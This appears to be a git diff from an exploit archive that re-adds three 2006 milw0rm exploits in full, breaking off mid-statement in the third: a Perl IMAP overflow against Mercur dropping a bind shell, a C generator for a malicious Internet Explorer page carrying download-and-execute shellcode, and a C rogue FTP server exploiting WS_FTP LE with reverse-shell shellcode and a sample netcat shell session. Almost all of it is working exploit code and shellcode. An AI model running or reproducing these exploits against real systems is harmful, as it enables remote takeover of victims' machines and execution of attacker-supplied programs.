b/platforms/windows/remote/2345.pl index 71ae0d4d5..b0585166c 100755 --- a/platforms/windows/remote/2345.pl +++ b/platforms/windows/remote/2345.pl 
@@ -1,96 +1,96 @@ -#!/usr/bin/perl -# Tested on Windows 2k Sp4 Italian and English version and Win XP Pro SP2 Italian and English #version -# Perl script based on Sami FTP server remote exploit by Critical Security -# http://www.securityfocus.com/bid/17138 -# acaro [at] jervus.it - - -use IO::Socket::INET; -use Switch; - -if (@ARGV < 2) { -print "--------------------------------------------------------------------\n"; -print "Usage : mercur-login.pl -hTargetIPAddress -oTargetReturnAddress\n"; -print " Return address: \n"; -print " 1 - 0x0258d087 Windows 2k Sp4 English Italian Version\n"; -print " 2 - 0x020cd083 Windows XP Pro SP2 English Italian Version\n"; -print " If values not specified, Windows 2k Sp4 will be used.\n"; -print " Example : ./mercur-login.pl -h127.0.0.1 -o1\n"; -print "--------------------------------------------------------------------\n"; -} - -my $host = "127.0.0.1"; - -my $port = 143; -my $reply; -my $request; -my $pad = "\x90"x268; -my $eip = "\x87\xd0\x58\x02"; # default eip is for Win2k SP4 - - -foreach (@ARGV) { -$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/); -$eip = $1 if ($_=~/-o(.*)/); -} - -switch ($eip) { -case 1 { $eip = "\x87\xd0\x58\x02" } # Windows Win2k SP4 English and Italian version -case 2 { $eip = "\x83\xd0\x0c\x02" } # Windows XP SP2 English and Italian version -} - -#Metasploit bind 4444 shellcode -my $shellcode= -"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" . -"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" . -"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" . -"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" . -"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66" . -"\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6" . -"\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa" . -"\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f" . 
-"\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb" . -"\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba" . -"\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb" . -"\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc" . -"\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61" . -"\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70" . -"\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44" . -"\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7" . -"\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69" . -"\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9" . -"\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0" . -"\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3" . -"\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7" . -"\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0" . -"\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67" . -"\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1" . -"\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0" . -"\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88" . -"\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d" . -"\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95" . -"\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"; - - - -my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port); -$socket or die "Cannot connect to host!\n"; - -recv($socket, $reply, 1024, 0); -print "Response:" . $reply; -$exploit = "a001 LOGIN " . $pad. $eip .$shellcode."\r\n"; - -send $socket, $exploit, 0; -print "[+] sending 1st chunk\n"; - -$exploit = "a001 LOGIN " . $pad. 
$eip ."\r\n"; - -send $socket, $exploit, 0; -print "[+] sending 2nd chunk\n"; - -print " + connecting port 4444 of $host ...\n"; -system("telnet $host 4444"); - -close $socket; -exit; - -# milw0rm.com [2006-09-11] +#!/usr/bin/perl +# Tested on Windows 2k Sp4 Italian and English version and Win XP Pro SP2 Italian and English #version +# Perl script based on Sami FTP server remote exploit by Critical Security +# http://www.securityfocus.com/bid/17138 +# acaro [at] jervus.it + + +use IO::Socket::INET; +use Switch; + +if (@ARGV < 2) { +print "--------------------------------------------------------------------\n"; +print "Usage : mercur-login.pl -hTargetIPAddress -oTargetReturnAddress\n"; +print " Return address: \n"; +print " 1 - 0x0258d087 Windows 2k Sp4 English Italian Version\n"; +print " 2 - 0x020cd083 Windows XP Pro SP2 English Italian Version\n"; +print " If values not specified, Windows 2k Sp4 will be used.\n"; +print " Example : ./mercur-login.pl -h127.0.0.1 -o1\n"; +print "--------------------------------------------------------------------\n"; +} + +my $host = "127.0.0.1"; + +my $port = 143; +my $reply; +my $request; +my $pad = "\x90"x268; +my $eip = "\x87\xd0\x58\x02"; # default eip is for Win2k SP4 + + +foreach (@ARGV) { +$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/); +$eip = $1 if ($_=~/-o(.*)/); +} + +switch ($eip) { +case 1 { $eip = "\x87\xd0\x58\x02" } # Windows Win2k SP4 English and Italian version +case 2 { $eip = "\x83\xd0\x0c\x02" } # Windows XP SP2 English and Italian version +} + +#Metasploit bind 4444 shellcode +my $shellcode= +"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" . +"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" . +"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" . +"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" . +"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66" . +"\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6" . 
+"\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa" . +"\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f" . +"\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb" . +"\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba" . +"\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb" . +"\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc" . +"\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61" . +"\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70" . +"\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44" . +"\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7" . +"\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69" . +"\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9" . +"\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0" . +"\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3" . +"\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7" . +"\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0" . +"\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67" . +"\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1" . +"\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0" . +"\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88" . +"\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d" . +"\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95" . +"\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"; + + + +my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port); +$socket or die "Cannot connect to host!\n"; + +recv($socket, $reply, 1024, 0); +print "Response:" . $reply; +$exploit = "a001 LOGIN " . $pad. $eip .$shellcode."\r\n"; + +send $socket, $exploit, 0; +print "[+] sending 1st chunk\n"; + +$exploit = "a001 LOGIN " . $pad. 
$eip ."\r\n"; + +send $socket, $exploit, 0; +print "[+] sending 2nd chunk\n"; + +print " + connecting port 4444 of $host ...\n"; +system("telnet $host 4444"); + +close $socket; +exit; + +# milw0rm.com [2006-09-11] diff --git a/platforms/windows/remote/2358.c b/platforms/windows/remote/2358.c index cf5d04912..649104408 100755 --- a/platforms/windows/remote/2358.c +++ b/platforms/windows/remote/2358.c 
@@ -1,174 +1,174 @@ -/* -*----------------------------------------------------------------------- -* -* daxctle2.c - Internet Explorer COM Object Heap Overflow Download Exec Exploit -* !!! 0day !!! Public Version !!! -* -* Copyright (C) 2006 XSec All Rights Reserved. -* -* Author : nop -* : nop#xsec.org -* : http://www.xsec.org -* : -* Tested : Windows 2000 Server SP4 CN -* : + Internet Explorer 6.0 SP1 -* : Windows XP SP2 CN -* : + Internet Explorer 6.0 SP1 (You need some goodluck! :-) -* : -* Complie : cl daxctle2.c -* : -* Usage :d:\>daxctle2 -* : -* :Usage: daxctle [htmlfile] -* : -* :d:\>daxctle2 http://xsec.org/xxx.exe xxx.htm -* : -* -*------------------------------------------------------------------------ -*/ - -#include -#include - -FILE *fp = NULL; -char *file = "xsec.htm"; -char *url = NULL; - -// Download Exec Shellcode by nop -unsigned char sc[] = -"\xe9\xa3\x00\x00\x00\x5f\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b" -"\x70\x1c\xad\x8b\x68\x08\x8b\xf7\x6a\x04\x59\xe8\x43\x00\x00\x00" -"\xe2\xf9\x68\x6f\x6e\x00\x00\x68\x75\x72\x6c\x6d\x54\xff\x16\x95" -"\xe8\x2e\x00\x00\x00\x83\xec\x20\x8b\xdc\x6a\x20\x53\xff\x56\x04" -"\xc7\x04\x03\x5c\x61\x2e\x65\xc7\x44\x03\x04\x78\x65\x00\x00\x33" -"\xc0\x50\x50\x53\x57\x50\xff\x56\x10\x8b\xdc\x50\x53\xff\x56\x08" -"\xff\x56\x0c\x51\x56\x8b\x75\x3c\x8b\x74\x2e\x78\x03\xf5\x56\x8b" -"\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33\xdb\x0f\xbe\x10" -"\x3a\xd6\x74\x08\xc1\xcb\x0d\x03\xda\x40\xeb\xf1\x3b\x1f\x75\xe7" -"\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd\x8b" -"\x04\x8b\x03\xc5\xab\x5e\x59\xc3\xe8\x58\xff\xff\xff\x8e\x4e\x0e" -"\xec\xc1\x79\xe5\xb8\x98\xfe\x8a\x0e\xef\xce\xe0\x60\x36\x1a\x2f" -"\x70"; - -char * header = -"\n" -"\n" -"XSec.org\n" -"\n" -"\n" -"\n" -"\n" -"\n"; - -// print unicode shellcode -void PrintUc(char *lpBuff, int buffsize) -{ - int i,j; - char *p; - char msg[4]; - - for(i=0;i [htmlfile]\r\n\n", argv[0]); - exit(1); - } - - url = argv[1]; - - //if( (!strstr(url, "http://") 
&& !strstr(url, "ftp://")) || strlen(url) < 10 || strlen(url) > 60) - if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10) - { - //printf("[-] Invalid url. Must start with 'http://','ftp://' and < 60 bytes.\n"); - printf("[-] Invalid url. Must start with 'http://','ftp://'\n"); - return; - } - - printf("[+] download url:%s\n", url); - - if(argc >=3) file = argv[2]; - printf("[+] exploit file:%s\n", file); - - fp = fopen(file, "w"); - if(!fp) - { - printf("[-] Open file error!\n"); - return; - } - - // print html header - fprintf(fp, "%s", header); - fflush(fp); - - // print shellcode - memset(buf, 0, sizeof(buf)); - sc_len = sizeof(sc)-1; - memcpy(buf, sc, sc_len); - memcpy(buf+sc_len, url, strlen(url)); - - sc_len += strlen(url)+1; - PrintUc(buf, sc_len); - - // print html footer - fprintf(fp, "%s", footer); - fflush(fp); - - printf("[+] exploit write to %s success!\n", file); -} - -// milw0rm.com [2006-09-13] +/* +*----------------------------------------------------------------------- +* +* daxctle2.c - Internet Explorer COM Object Heap Overflow Download Exec Exploit +* !!! 0day !!! Public Version !!! +* +* Copyright (C) 2006 XSec All Rights Reserved. +* +* Author : nop +* : nop#xsec.org +* : http://www.xsec.org +* : +* Tested : Windows 2000 Server SP4 CN +* : + Internet Explorer 6.0 SP1 +* : Windows XP SP2 CN +* : + Internet Explorer 6.0 SP1 (You need some goodluck! 
:-) +* : +* Complie : cl daxctle2.c +* : +* Usage :d:\>daxctle2 +* : +* :Usage: daxctle [htmlfile] +* : +* :d:\>daxctle2 http://xsec.org/xxx.exe xxx.htm +* : +* +*------------------------------------------------------------------------ +*/ + +#include +#include + +FILE *fp = NULL; +char *file = "xsec.htm"; +char *url = NULL; + +// Download Exec Shellcode by nop +unsigned char sc[] = +"\xe9\xa3\x00\x00\x00\x5f\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b" +"\x70\x1c\xad\x8b\x68\x08\x8b\xf7\x6a\x04\x59\xe8\x43\x00\x00\x00" +"\xe2\xf9\x68\x6f\x6e\x00\x00\x68\x75\x72\x6c\x6d\x54\xff\x16\x95" +"\xe8\x2e\x00\x00\x00\x83\xec\x20\x8b\xdc\x6a\x20\x53\xff\x56\x04" +"\xc7\x04\x03\x5c\x61\x2e\x65\xc7\x44\x03\x04\x78\x65\x00\x00\x33" +"\xc0\x50\x50\x53\x57\x50\xff\x56\x10\x8b\xdc\x50\x53\xff\x56\x08" +"\xff\x56\x0c\x51\x56\x8b\x75\x3c\x8b\x74\x2e\x78\x03\xf5\x56\x8b" +"\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33\xdb\x0f\xbe\x10" +"\x3a\xd6\x74\x08\xc1\xcb\x0d\x03\xda\x40\xeb\xf1\x3b\x1f\x75\xe7" +"\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd\x8b" +"\x04\x8b\x03\xc5\xab\x5e\x59\xc3\xe8\x58\xff\xff\xff\x8e\x4e\x0e" +"\xec\xc1\x79\xe5\xb8\x98\xfe\x8a\x0e\xef\xce\xe0\x60\x36\x1a\x2f" +"\x70"; + +char * header = +"\n" +"\n" +"XSec.org\n" +"\n" +"\n" +"\n" +"\n" +"\n"; + +// print unicode shellcode +void PrintUc(char *lpBuff, int buffsize) +{ + int i,j; + char *p; + char msg[4]; + + for(i=0;i [htmlfile]\r\n\n", argv[0]); + exit(1); + } + + url = argv[1]; + + //if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10 || strlen(url) > 60) + if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10) + { + //printf("[-] Invalid url. Must start with 'http://','ftp://' and < 60 bytes.\n"); + printf("[-] Invalid url. 
Must start with 'http://','ftp://'\n");
+ return;
+ }
+
+ printf("[+] download url:%s\n", url);
+
+ if(argc >=3) file = argv[2];
+ printf("[+] exploit file:%s\n", file);
+
+ fp = fopen(file, "w");
+ if(!fp)
+ {
+ printf("[-] Open file error!\n");
+ return;
+ }
+
+ // print html header
+ fprintf(fp, "%s", header);
+ fflush(fp);
+
+ // print shellcode
+ memset(buf, 0, sizeof(buf));
+ sc_len = sizeof(sc)-1;
+ memcpy(buf, sc, sc_len);
+ memcpy(buf+sc_len, url, strlen(url));
+
+ sc_len += strlen(url)+1;
+ PrintUc(buf, sc_len);
+
+ // print html footer
+ fprintf(fp, "%s", footer);
+ fflush(fp);
+
+ printf("[+] exploit write to %s success!\n", file);
+}
+
+// milw0rm.com [2006-09-13]
diff --git a/platforms/windows/remote/2401.c b/platforms/windows/remote/2401.c
index 7b84ecf37..41614d553 100755
--- a/platforms/windows/remote/2401.c
+++ b/platforms/windows/remote/2401.c
@@ -1,185 +1,185 @@ -/* -ws_exp.c -WS_FTP LE 5.08 (PASV response) 0day buffer overflow exploit -Coded by h07 -Tested on XP SP2 Polish, 2000 SP4 Polish -Example: - -C:\>ws_exp 1 192.168.0.1 4444 - -[*] WS_FTP LE 5.08 (PASV response) 0day buffer overflow exploit -[*] Coded by h07 -[+] Listening on 21 -[+] Connection accepted from 192.168.0.3 -[+] Client request: USER h07 -[+] Client request: PWD -[+] Client request: SYST -[+] Client request: HELP -[+] Client request: PASV -[+] Sending buffer: OK -[*] Press enter to quit - -C:\>nc -v -l -p 4444 -listening on [any] 4444 ... -connect to [192.168.0.1] from (UNKNOWN) [192.168.0.3] 2809: NO_DATA -Microsoft Windows 2000 [Wersja 5.00.2195] -(C) Copyright 1985-2000 Microsoft Corp. - -C:\Program Files\WS_FTP> -*/ - -#include -#define PORT 21 -#define BUFF_SIZE 1024 -#define RESPONSE "200 blah blah\r\n" - -typedef struct - { - char os_name[32]; - unsigned long ret; - } target; - -char shellcode[] = -/* -win32 reverse shellcode (thx metasploit.com) -bad chars: 0x00 0x20 0x0a 0x0d 0x28 0x29 -*/ -"\x2b\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x87" -"\x61\xbc\xd8\x83\xeb\xfc\xe2\xf4\x7b\x0b\x57\x95\x6f\x98\x43\x27" -"\x78\x01\x37\xb4\xa3\x45\x37\x9d\xbb\xea\xc0\xdd\xff\x60\x53\x53" -"\xc8\x79\x37\x87\xa7\x60\x57\x91\x0c\x55\x37\xd9\x69\x50\x7c\x41" -"\x2b\xe5\x7c\xac\x80\xa0\x76\xd5\x86\xa3\x57\x2c\xbc\x35\x98\xf0" -"\xf2\x84\x37\x87\xa3\x60\x57\xbe\x0c\x6d\xf7\x53\xd8\x7d\xbd\x33" -"\x84\x4d\x37\x51\xeb\x45\xa0\xb9\x44\x50\x67\xbc\x0c\x22\x8c\x53" -"\xc7\x6d\x37\xa8\x9b\xcc\x37\x98\x8f\x3f\xd4\x56\xc9\x6f\x50\x88" -"\x78\xb7\xda\x8b\xe1\x09\x8f\xea\xef\x16\xcf\xea\xd8\x35\x43\x08" -"\xef\xaa\x51\x24\xbc\x31\x43\x0e\xd8\xe8\x59\xbe\x06\x8c\xb4\xda" -"\xd2\x0b\xbe\x27\x57\x09\x65\xd1\x72\xcc\xeb\x27\x51\x32\xef\x8b" -"\xd4\x22\xef\x9b\xd4\x9e\x6c\xb0\x87\x61\xbc\xd8\xe1\x09\xbc\xd8" -"\xe1\x32\x35\x39\x12\x09\x50\x21\x2d\x01\xeb\x27\x51\x0b\xac\x89" -"\xd2\x9e\x6c\xbe\xed\x05\xda\xb0\xe4\x0c\xd6\x88\xde\x48\x70\x51" 
-"\x60\x0b\xf8\x51\x65\x50\x7c\x2b\x2d\xf4\x35\x25\x79\x23\x91\x26" -"\xc5\x4d\x31\xa2\xbf\xca\x17\x73\xef\x13\x42\x6b\x91\x9e\xc9\xf0" -"\x78\xb7\xe7\x8f\xd5\x30\xed\x89\xed\x60\xed\x89\xd2\x30\x43\x08" -"\xef\xcc\x65\xdd\x49\x32\x43\x0e\xed\x9e\x43\xef\x78\xb1\xd4\x3f" -"\xfe\xa7\xc5\x27\xf2\x65\x43\x0e\x78\x16\x40\x27\x57\x09\x4c\x52" -"\x83\x3e\xef\x27\x51\x9e\x6c\xd8"; - -char buffer[BUFF_SIZE]; - -target list[] = - { - "XP SP2 Polish", - 0x7d16887b, //JMP ESI - - "2000 SP4 Polish", - 0x776f2015, //JMP ESI - - "XP SP2 English", - 0x7cb9e082, //JMP ESI - - "2000 SP4 English", - 0x7848a5f1, //JMP ESI - - "XP SP2 German", - 0x7ca96834 //JMP ESI - }; - -void config_shellcode(unsigned long ip, unsigned short port) - { - memcpy(&shellcode[184], &ip, 4); - memcpy(&shellcode[190], &port, 2); - } - -int main(int argc, char *argv[]) -{ -WSADATA wsa; -int sock, cl, len, os, r_len, i, -a = (sizeof(list) / sizeof(target)) - 1; -unsigned long connectback_IP, eip; -unsigned short connectback_port; -struct sockaddr_in server, client; - -printf("\n[*] WS_FTP LE 5.08 (PASV response) 0day buffer overflow exploit\n"); -printf("[*] Coded by h07 \n"); - -if(argc < 4) - { - printf("[*] Usage: %s \n", argv[0]); - printf("[*] Sample: %s 0 192.168.0.1 4444\n", argv[0]); - printf("[*] Systems..\n"); - for(i = 0; i <= a; i++) - printf("[>] %d: %s\n", i, list[i].os_name); - return 1; - } - -WSAStartup(MAKEWORD(2, 0), &wsa); - -os = atoi(argv[1]); - -if((os < 0) || (os > a)) - { - printf("[-] Error: unknown target %d\n", os); - return -1; - } - -eip = list[os].ret; -connectback_IP = inet_addr(argv[2]) ^ (ULONG)0xd8bc6187; -connectback_port = htons(atoi(argv[3])) ^ (USHORT)0xd8bc; -config_shellcode(connectback_IP, connectback_port); - -if((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) - { - printf("[-] Socket error\n"); - return -1; - } - -server.sin_family = AF_INET; -server.sin_addr.s_addr = htonl(INADDR_ANY); -server.sin_port = htons(PORT); - -bind(sock, (struct sockaddr *) 
&server, sizeof(server)); -listen(sock, 1); - -printf("[+] Listening on %d\n", PORT); - -len = sizeof(client); -cl = accept(sock, (struct sockaddr *) &client, &len); - -printf("[+] Connection accepted from %s\n", inet_ntoa(client.sin_addr)); - -send(cl, "200 evil server ready :>\r\n", 26, 0); - -for(i = 0; i <= 3; i++) - { - memset(buffer, 0x00, BUFF_SIZE); - recv(cl, buffer, BUFF_SIZE - 1, 0); - printf("[+] Client request: %s", buffer); - send(cl, RESPONSE, strlen(RESPONSE), 0); - } - -//PASV request -memset(buffer, 0x00, BUFF_SIZE); -recv(cl, buffer, BUFF_SIZE - 1, 0); -printf("[+] Client request: %s", buffer); - -//PASV response -r_len = 1011; -memset(buffer, 0x90, BUFF_SIZE); -memcpy(buffer, "200 \x31\xc0", 6); -memcpy(buffer + 6, shellcode, sizeof(shellcode) - 1); -*((unsigned long*)(&buffer[r_len])) = eip; -memcpy(buffer + (r_len + 4), "\r\n\x00", 3); - -if(send(cl, buffer, strlen(buffer), 0) != -1) -printf("[+] Sending buffer: OK\n"); -else -printf("[-] Sending buffer: failed\n"); - -printf("[*] Press enter to quit\n"); -getchar(); - -return 0; -} - -// milw0rm.com [2006-09-20] +/* +ws_exp.c +WS_FTP LE 5.08 (PASV response) 0day buffer overflow exploit +Coded by h07 +Tested on XP SP2 Polish, 2000 SP4 Polish +Example: + +C:\>ws_exp 1 192.168.0.1 4444 + +[*] WS_FTP LE 5.08 (PASV response) 0day buffer overflow exploit +[*] Coded by h07 +[+] Listening on 21 +[+] Connection accepted from 192.168.0.3 +[+] Client request: USER h07 +[+] Client request: PWD +[+] Client request: SYST +[+] Client request: HELP +[+] Client request: PASV +[+] Sending buffer: OK +[*] Press enter to quit + +C:\>nc -v -l -p 4444 +listening on [any] 4444 ... +connect to [192.168.0.1] from (UNKNOWN) [192.168.0.3] 2809: NO_DATA +Microsoft Windows 2000 [Wersja 5.00.2195] +(C) Copyright 1985-2000 Microsoft Corp. 
+ +C:\Program Files\WS_FTP> +*/ + +#include +#define PORT 21 +#define BUFF_SIZE 1024 +#define RESPONSE "200 blah blah\r\n" + +typedef struct + { + char os_name[32]; + unsigned long ret; + } target; + +char shellcode[] = +/* +win32 reverse shellcode (thx metasploit.com) +bad chars: 0x00 0x20 0x0a 0x0d 0x28 0x29 +*/ +"\x2b\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x87" +"\x61\xbc\xd8\x83\xeb\xfc\xe2\xf4\x7b\x0b\x57\x95\x6f\x98\x43\x27" +"\x78\x01\x37\xb4\xa3\x45\x37\x9d\xbb\xea\xc0\xdd\xff\x60\x53\x53" +"\xc8\x79\x37\x87\xa7\x60\x57\x91\x0c\x55\x37\xd9\x69\x50\x7c\x41" +"\x2b\xe5\x7c\xac\x80\xa0\x76\xd5\x86\xa3\x57\x2c\xbc\x35\x98\xf0" +"\xf2\x84\x37\x87\xa3\x60\x57\xbe\x0c\x6d\xf7\x53\xd8\x7d\xbd\x33" +"\x84\x4d\x37\x51\xeb\x45\xa0\xb9\x44\x50\x67\xbc\x0c\x22\x8c\x53" +"\xc7\x6d\x37\xa8\x9b\xcc\x37\x98\x8f\x3f\xd4\x56\xc9\x6f\x50\x88" +"\x78\xb7\xda\x8b\xe1\x09\x8f\xea\xef\x16\xcf\xea\xd8\x35\x43\x08" +"\xef\xaa\x51\x24\xbc\x31\x43\x0e\xd8\xe8\x59\xbe\x06\x8c\xb4\xda" +"\xd2\x0b\xbe\x27\x57\x09\x65\xd1\x72\xcc\xeb\x27\x51\x32\xef\x8b" +"\xd4\x22\xef\x9b\xd4\x9e\x6c\xb0\x87\x61\xbc\xd8\xe1\x09\xbc\xd8" +"\xe1\x32\x35\x39\x12\x09\x50\x21\x2d\x01\xeb\x27\x51\x0b\xac\x89" +"\xd2\x9e\x6c\xbe\xed\x05\xda\xb0\xe4\x0c\xd6\x88\xde\x48\x70\x51" +"\x60\x0b\xf8\x51\x65\x50\x7c\x2b\x2d\xf4\x35\x25\x79\x23\x91\x26" +"\xc5\x4d\x31\xa2\xbf\xca\x17\x73\xef\x13\x42\x6b\x91\x9e\xc9\xf0" +"\x78\xb7\xe7\x8f\xd5\x30\xed\x89\xed\x60\xed\x89\xd2\x30\x43\x08" +"\xef\xcc\x65\xdd\x49\x32\x43\x0e\xed\x9e\x43\xef\x78\xb1\xd4\x3f" +"\xfe\xa7\xc5\x27\xf2\x65\x43\x0e\x78\x16\x40\x27\x57\x09\x4c\x52" +"\x83\x3e\xef\x27\x51\x9e\x6c\xd8"; + +char buffer[BUFF_SIZE]; + +target list[] = + { + "XP SP2 Polish", + 0x7d16887b, //JMP ESI + + "2000 SP4 Polish", + 0x776f2015, //JMP ESI + + "XP SP2 English", + 0x7cb9e082, //JMP ESI + + "2000 SP4 English", + 0x7848a5f1, //JMP ESI + + "XP SP2 German", + 0x7ca96834 //JMP ESI + }; + +void config_shellcode(unsigned long ip, unsigned short port) + { + 
memcpy(&shellcode[184], &ip, 4); + memcpy(&shellcode[190], &port, 2); + } + +int main(int argc, char *argv[]) +{ +WSADATA wsa; +int sock, cl, len, os, r_len, i, +a = (sizeof(list) / sizeof(target)) - 1; +unsigned long connectback_IP, eip; +unsigned short connectback_port; +struct sockaddr_in server, client; + +printf("\n[*] WS_FTP LE 5.08 (PASV response) 0day buffer overflow exploit\n"); +printf("[*] Coded by h07 \n"); + +if(argc < 4) + { + printf("[*] Usage: %s \n", argv[0]); + printf("[*] Sample: %s 0 192.168.0.1 4444\n", argv[0]); + printf("[*] Systems..\n"); + for(i = 0; i <= a; i++) + printf("[>] %d: %s\n", i, list[i].os_name); + return 1; + } + +WSAStartup(MAKEWORD(2, 0), &wsa); + +os = atoi(argv[1]); + +if((os < 0) || (os > a)) + { + printf("[-] Error: unknown target %d\n", os); + return -1; + } + +eip = list[os].ret; +connectback_IP = inet_addr(argv[2]) ^ (ULONG)0xd8bc6187; +connectback_port = htons(atoi(argv[3])) ^ (USHORT)0xd8bc; +config_shellcode(connectback_IP, connectback_port); + +if((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) + { + printf("[-] 